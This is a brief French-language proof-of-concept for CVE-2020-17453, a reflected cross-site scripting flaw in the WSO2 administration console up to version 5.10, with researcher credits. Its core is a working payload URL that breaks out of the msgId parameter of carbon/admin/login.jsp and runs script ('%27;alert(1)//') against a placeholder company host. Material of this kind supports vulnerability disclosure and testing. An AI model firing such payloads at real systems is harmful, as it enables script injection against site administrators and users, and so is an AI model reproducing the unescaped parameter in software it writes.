
PoC (Preuve de concept) - CVE-2020-17453
CVE-2020-17453
La console d'administration WSO2 jusqu'à la version 5.10 permet une XSS via le paramètre msgId de carbon/admin/login.jsp.

https://<company>.com/carbon/admin/login.jsp?msgId=%27;alert(1)//
Nom : Jackson Henry
Twitter : @JacksonHHax
Nom : Nicholas Young